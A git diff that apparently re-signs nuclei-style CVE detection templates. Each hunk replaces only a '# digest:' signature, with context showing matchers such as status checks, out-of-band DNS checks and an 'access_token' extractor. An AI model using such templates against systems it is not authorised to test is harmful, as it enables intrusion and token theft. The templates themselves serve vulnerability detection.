4a0a004730450220243836b94a2d61545b25c455eded8de7de85ac65d3b6b9af8a8fcc77b63fd743022100f5505508a01612d3ac0944285448da37021c6c8b43040cc8e87ead6567966426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5081df6165056d0a60232314176ee608ab7e86aa51515dacb0184c53b2581c102201d2d5a1485f62e7956ae2a64a91ef95e9840ab920e077c73bf79ff44ac7ea570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 0c7a1c2d1c..3f2061da50 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -74,4 +74,4 @@ http: part: body_5 words: - '{{md5(string)}}' -# digest: 4b0a00483046022100d7b6619c72c238c99a15d4e2ccbeb5947b35506428ff680745d8ed73d15be7aa022100f8ef9c366ae03cf2cabed62594a0196e56719a271b4b998989058443a21834d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de3df7082a571b36e73fa64a73081349b3fd29a223f127fb5708c1ffb614d48102204dfb2aff3fb0b2d649a29ab7caafb7126fe6de5cbd78e0a753884d0eebedcd38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 5c1031bc35..91203fae80 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be3e89c169301c2f96af2d6f398c8af9f377d1975edcd2a2b71eca1f988bc6320220578c949433c1f05c0b03f6a655ca57e5493f25351907897137aa40013864888f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 6b42a00699..22ae0683f6 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -56,4 +56,4 @@ http: - duration>=5 - 'contains(body, "Guest Information")' condition: and -# digest: 490a0046304402202f3f74b2aa2805006791102f5519990f7d0e4824ad34b3c4abeed275fedb7caa02204b28c27e4cdb49f6286322ce20f2009ee727d644cfaa0880970674e4487400e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f44d3b09198876fbf4b217649455afe606b9cea6230a8f7c292cc156ed077aa02204e0ac7e376ccf8d57157caa5243b1ce6605cc29ba6f89bc4b7c195579eeb6de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 88c763a994..376885c52a 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039dcb449ff8816bc8cca6ea716b492917a6bc9699edff02714b46da93f9a584c022020e0fe7c1a69d8fc404e66eb77dbdbdcc0ac90efddccafe76b4adb310f5b540e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8d8b8a7e397064411042c3c9892231cf0075e26054416f0d77179c53a88a107022100eeec4f5165b4101d2bd809a7cbd2dfaee4950ab40d84ff7e6876c7089b79a01e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 6b7c59e0d6..610c0d8772 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202166d86ce51fb834d2224a38c2fc782a361c00323225718ad53ac225a1fc99e5022100b50ae20578925fa33bf3bf21b84ca62ad1f608e065b119d67da180e3c888efb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008437593007f282b4fa436dde37e968f021cdcb420dc06e8dad33f90f5c9c07d602210095e900731062e3f7559a188a77a5651a8de341aef8e82c5ebce4b0cabe0ae026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index bea9bcc4eb..3a2dde0702 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -36,4 +36,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' condition: and -# digest: 4a0a0047304502206a66f6bc50518dd31432eccadd91e6dc8c2f79f3e27eb9f8b19578b0d72173a6022100d83612654984ad122725ef43c6cb741afbb79651f92547af91c3b9caa1409694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f97821e8560212cacd737cf3143cc95c35378c592396c0c7cca9d2e93acf482302210080da39a9593817aa30d0248c17f050014f39b550c97b784de33e60ea07a0c2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 214d4132e9..c67daa15c9 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe79b6e44ab8020b7faefa67f3a3d4942a785bad4463a968f3dd2a6f86c3f762022100f7d484210f37cf4a1a39a45131261d1aebd56373323505b1eddfac6ce045f90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e3b73e83543aad29fe760dc1db5fe37af306be56393c9926c65237e1566087e022100fbaedc4ef522a795c82b516441b5c8986414a7cf70007ec13d5535577d0db370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 1d4c47d875..1e306b33f3 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -41,4 +41,4 @@ http: part: header words: - "application/vnd.ms-excel" -# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204756644785cf8f6b3401876888de1efa5f00a2e2ce9ffc5e4eacf75cacae41f802200bb338ccebf1d53d196c50f415070a8ad4c488c6dafb66abab734395dd4ca6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index aba9b02418..3777c684c3 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -81,4 +81,4 @@ http: regex: - "([a-f0-9]{64}\\.ini)" internal: true -# digest: 4b0a00483046022100a67930b1a559ef939fdac690ac071be30685b6ef1c3c0a846c5569458aba33af022100c8fab782acd1cf1010a6d7ffa9d61f885432f29c8247207c7ca0b60d43b67a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050c0c86d37adc93f15483be39ba88b4ef0b2147733b63f599775bb98e8b82e5702202f3f2ce3ef76d2946847a13a8badb6ce89120b87a6559d7b4e4187a798e29c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 8e87afd17d..bd8415c11f 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0b807462fd2f740b6f35584821ecfcf41b62f92b2d611633a88ce0956d97ccc02202e8a6c9210020dea7ac6831519e021a0a8c55e8fac3baf8525bcb12e15dd4fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073b755c2e659b0e06ce652bf92d78132a56bea015b5226349c97deda0da9684f02204b07d43c5e8c19c0cf73d9824d1ebbc7e5f51c7a8169cf48e005d02d1a0776d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index e119981f5c..ab96df5842 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -103,4 +103,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body_4 -# digest: 490a0046304402207ad7b347a592e2187ab82ad8fcd08c9e9450340488818c2461f1b556f453438d022052153b577f0a31f4f323829b25293bd92882d19fd5ee60f7374293fec0f1dc93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac504d10da08b3f7ed6416ad38d78217a6e95a680ec872cb3ab0c7b19370adab022100f5c4676697e678d9c7b57b56b4645a1352e5f9859614a9ea306cde51d543e182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 5014790749..569f2aa483 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e65673944288c4ea38c1044a22777033e8ab6412a422cd751c1d2f1ed8dbf9a302207988cbc88e6e5d2a866dc57363ee691a4b374a1422637e2c051edb10462c5421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c5a80d771051373a8c6b0c2ca248ca734e5ee7408acfd6d2fb3c85902d221fb0221008f595d668911595afa24a9370d94dfb8fec9e8ce381ef47016acd2dc70a53914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 716d33643d..9181d15f53 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -52,4 +52,4 @@ http: - type: json json: - .data.content[].path -# digest: 4a0a0047304502204ab9d58c827030307982f2317cf0ef5e0e46c5e54170976febd9ae98ad7c5e62022100c5d29929622fac47b5729e0314b96749a088e78fc9b1eb2ae10b87a7e649ae16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100efb567bb46806b832495db880a8d13ebf428236bbe8dd99a8e915d3d0083318c022100b8451f80fc10358d1ab1f2acb9eae70278f042d67f9be136ccdee84a9517bfe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index a622aebde7..edea449c5d 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -52,4 +52,4 @@ http: - type: json json: - .data.content[].path -# digest: 490a00463044022027971041cce2ae19d7cb8074fb5dc9fdaab73699738e82a5de416cb674e2cecd022005349f9c79dd0692cb3cb08cf619db48fe91f489a6fec5b33874ddb2870f6398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c2a1dc67a28b7eed25ccf947755d6b97c566adf8a533a872f2a591d8c6915dd0220590851b1a68c6ae150b8e44d41cabf453e69386d98d8e71c105c314330be9d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index c33d1b1d78..80fa48f14c 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008b98c50259984aac531d4812c005be599db235324a444c7a125dcc0fab0925002200fec9d238e01e18c9a70223ed7e68eea8945c5628b7149aebded1e9259cf169e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089f80319b143c93e7435f2ec2060f9f63dd6bcc3c5f0876c3c357bf2e5e48243022100d2fe9ab17fc05c6192cbae674f24c8a5ecc5d4396d83bd4d97007aacbe0c8bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 008c25c278..edb08ddfc2 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -60,4 +60,4 @@ http: - contains(header_2, "text/html") - status_code_2 == 200 condition: and -# digest: 4a0a0047304502206fe16e183f71cbc3bfc374aaa3ea9730e8d0ed6830941bbdd8bd018d5787f8a0022100fc4ad26f98267cab592d1c2067bd512bb432d6a75b44b068e975176fd45401eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220643ea5d25ebd6462175647d0352e654dec11e5bbf97098502cdba54aa2b37b10022100f78b5a0c6736fc0b38d6b15d12a5a19cd77d77a558d46f34e3aed6499cbae411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 75a21edba1..c9233a7022 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca5945dbf47943040f2934f8e61572c444140181a2cd484157f8e613510793ab02205adca55c099f7c849eb2adfdc1ce94a13d7c7d7c952dae099947665f691df30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3d764f1deaab0a74aa395664d2c03375128689f44db8ac4feaf8922dc7865e5022031daff978d8f50006c44303b8278c4488897eea780a082bd4bae73abcda826f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 84e7faf058..9f3bafac24 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8826a6a2aea8b8fdf4bfc526ec4eaf6e1a0613d805ba05235b18095a7a5796b0220449dc6d5f9a0d9bba00cbcd3d271d7ea2cd057ea1993f5acadaeb5edc012f478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009745433d8fa4b1a3de037ad2643c660e2c41e7c4150f54586807f4bdaf0963d6022051607fcc74bc68a32134c9eec40c7bacab67274ee662e00ef0cfcd80562312c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 10a859096f..c2bacff0ca 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -84,4 +84,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and -# digest: 4a0a00473045022059a2c7c448168f275b677d59ae6772e136b5cae38b3de5aec573a0498d7353b5022100b9e76c5236c7c11bb720146bb88b08f7f6b7945adc1c103571628437c4f2262e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206452761da1ebb71b5a2a85b17082354777b0f30a6d38f593ff0fd444629930430221008ec0e5895d41eaf6753d851aafa270e8bfdae54dc65c302ae5e25926af894564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 8be52fb07f..829857fc0d 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a917400368cfdba77d790147d84d75dde69c698ea1f50eb87e2e46ef3802e6702204a6951c6f20cf4e0722ad2424746f227dd1fb1172fe5f7e624c00010f826aa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a68493afeda3a529c805502d554dd09859471f0b6f015d91fc552daf23ecdab02206b1a2148e223a672e1bea3d217a5a72cc442d12cde66b1bd15d9548a6f6b2e55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 5257ce52bb..6d11af6d44 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -74,4 +74,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a00473045022100ae8a56772a4bdf5d579c5a73fbfb6039c2a9d3907cbd13cc12f77a507b42ac6202204915a2338b893189e1f666a217b8e10ce060bab542e3ecb50151f15b2ff37559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220575ada41e067b0063b7ad7058003ec029cfee0ca830bf8c18febb02c0933bfa502201d1566c2a59d49ef5a0289309769e0894ce341b208c868479d9b7a85b588aeed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 0e9c7058d9..3187e4b027 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and -# digest: 4b0a00483046022100dd2b30d77bd7fdbf38132b03bf1799f609b6434de967ef4df2ad9a875f78a1a7022100b3979a2c39405f62a7af632bf637171fd653ed4121ee891ddabc6d19b422be6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a4f14fb887d4162c99d5eda9b4b44f8a1b9026c67fad542d58e4f09e8367985022100c5c3b3af216393ea60cb48060d69ca2138c766ddf29c2d9f47c4017ae54f2ab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 5be50160fd..30f4b75b44 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "") && contains(body_2, "import_form_template")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450220353eff964c533a49e3c19d5bb0058b18616fc012d2fdba215438ed89028e46fe022100f8f7ba5442e1e6c4a9f638ce048f7fd25f8e3b8bf43e6f77c3b3226be5003f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051ec230e42ab3d71b2df53e401ba10a6682241d7989e90d7011432f85b6c166902210084f6c6e8762f3a08a4ccce739038532489a572defba5e4e59c17d34a9470de42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 053ee7a608..8782959d43 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -52,4 +52,4 @@ http: - contains(interactsh_protocol, 'dns') - status_code == 200 condition: and -# digest: 4b0a00483046022100e9856a868993faad7af5c56725bd8696e4de74eea2c24b5ad1ba5f8877d76563022100b1d699ee80eddd7171d4ef25f622d44a5c87142dd41afd820d4ad1ff2b9b70b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0d7db72cf2d3250b9cec6f4809158d7a36e2c52763f0d5bb3d4063ed878f6820220298d902c4967c3ff8d30ccca8aded010c4b182fd6d9af361525c23d6730e4bb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index bbc05135e8..a1a7d66ca9 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -49,4 +49,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b7f0be98221b5f266e90dba3b2252cfbaf63e4ce9f4673e14be3b78cb46ef9d022100910b2d487c59c89de52ae909540e8e890e4dc89dc7240686aa95181c045ee5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index cd108edfd0..a18c54bbb8 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -50,4 +50,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4a0a00473045022100e2618a3728707739f3a031285e196d3b43d5bf03d3f4e6e53e28d654b97d694602203d8fd37c306cee28bd1c86e457dbde123a4af70c48824d8539dca9d6e6106e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eccd6573796683e57056fb5dc00be04eb056625acbc7478e5f3c0d4d5f780ddc022001852cd078ce0c1ab64b9afb70fe440f5c3d0b7e64b303e4b7f3e78672ab882c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 3094b803ce..949dfa0687 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -67,4 +67,4 @@ http: part: body_1 regex: - 'ico_res_(\w+)_on\.jsp' -# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710398a4a993d2c9e45d26d85f9c179770dfdd348036bd851f0daca96e1055d9022021d4a672da767d580f3c36cb6b47aa8439cd36951761b993231f735ecd100f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index d91014ab9d..064fde68dd 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">w71ch") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022027cd912e53fe3d0f2326275dd4ccade28bab4684b50300171df9b865796e73be022100a4a0c5e64721b43ab72868d32738f431adf44fa42083842dc9faa71541da7677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8e2700b8f5be675dc9f95b5ea57b298a1168058d65a5eca4293bdb3e2c29d8602203a7928ef43f783f95a42125895d5ef3073b7d99808f8989d5c24611901a67565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 4a34e6d213..aea850fd7e 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210092efe2f7cbaa87951776951c53fc173d616cbec9006b475bef3a28d4e713c0a302204f45c907afe1173bcb87289b260f05e5301354aa04df9c0b878d45914e35b075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d59a360884361f658aa4ed740d619a553796291f36085ba3a6f6d0d925e8e0f022100d609d48648eade90c15f03f07573bce9aaa52138ff9c38ca80f239a2a0aded03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 0233a5617a..bf01b42796 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and -# digest: 4b0a00483046022100e52e37ba7cbb0809f204d6bf85295214994040f499549c02451dc287877adeb5022100e6f6a88c449847bf9aa171e91057daa40d93e1f86e2123e04355ff621d74b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e7b8940c3c99b564b4bddcd3a0a632bf8982f159d113a5fc4831416ed9e1a9e02200a4ef1d7ed1aef86a0ae2b23f751fe37b70b48ba7b55de80e1185477b905c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 1cb514d945..b112ba8913 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">","mooDating")' condition: and -# digest: 4a0a0047304502210095ca1683def9b0c91047311e6f9ac37e0cead694dff6725f35ea1656e831b3ae02205ee54ee3b2a7ac6698d824c665300872a060654f713a6fa82658a6734360c28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202751986b59332bc745de2c5c701823724a9ee6e91513a29689d5429469c723de022061e634ed487b4f3c4e3fb10ff500c82c0aa5c676d3e55638270d13781455afa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 2ee27c1645..4a75ed5211 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooDating")' condition: and -# digest: 4a0a00473045022100df789f78e15433e066ac366cd45fb0ab831dd27ec3327f322386fd167783fccf02207493d5c8e7275ba99d828a68c7bd4ce44c79b42867630faba0abc7e1b065b1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097be91084c3b6a75bcb35a7556fc7e09a909c5f07593800517da311c75b405a2022027c964fd5f65c5f28663417791ae7f162b89013265851f983a494cefa9fa1322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index b25bb87869..b1376febf8 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">s9a64") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022100eb8f361af200c602790d9ee669037a9794849480b4fd8c4985e9f9c24aea7a6a022029d23bdd9a0f5f73cbd8fde5c3dbda1648d7da792d88eaef5d89545923d756e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100976a429a0acadd41d7c73ccebbad61db7e7f7563ef6437758f5b07076b5218a6022100ec673a999416f67a8f70ed78449316a200fc7f2bcd4c6745c66108efd3ce5ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 0b11d5aa02..09c0af296a 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and -# digest: 490a00463044022028c709bfbd562c3f69c41bbb66973f2958762095b47c242410025b3a2271b7e90220062ee86e230c48160df50455b3584210913128460f183bf14324eca1353a77e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058675a969abbe4a2b7fa295342715495195d739ef396e23a4a0d438308f7da2602204db3cacf7da7334c43cc5614d12dea9155acca0e5edf872eff3e6c17a315c7ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 15ef4b2699..7a937c1c6d 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -73,4 +73,4 @@ http: - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException") - status_code_2 == 400 condition: and -# digest: 4a0a0047304502203102c0be553270c1adbdbabe997bbaea6e3adaf6c2c1e46a703305f68834c2cc02210094818702b8fab66d0d303cf006c3a5a3a12f0140323564cfd177e55e21325a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207913b60da21ca7a9f42e1038bdcef2c37179c41070550c9ba2c1a657b15aeed5022008b3bf5bf870aa43066ff7b66df7cc15b4b52b70e57706a7975de094f182ee9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index c959bc28b0..6fb0560f37 100644 --- 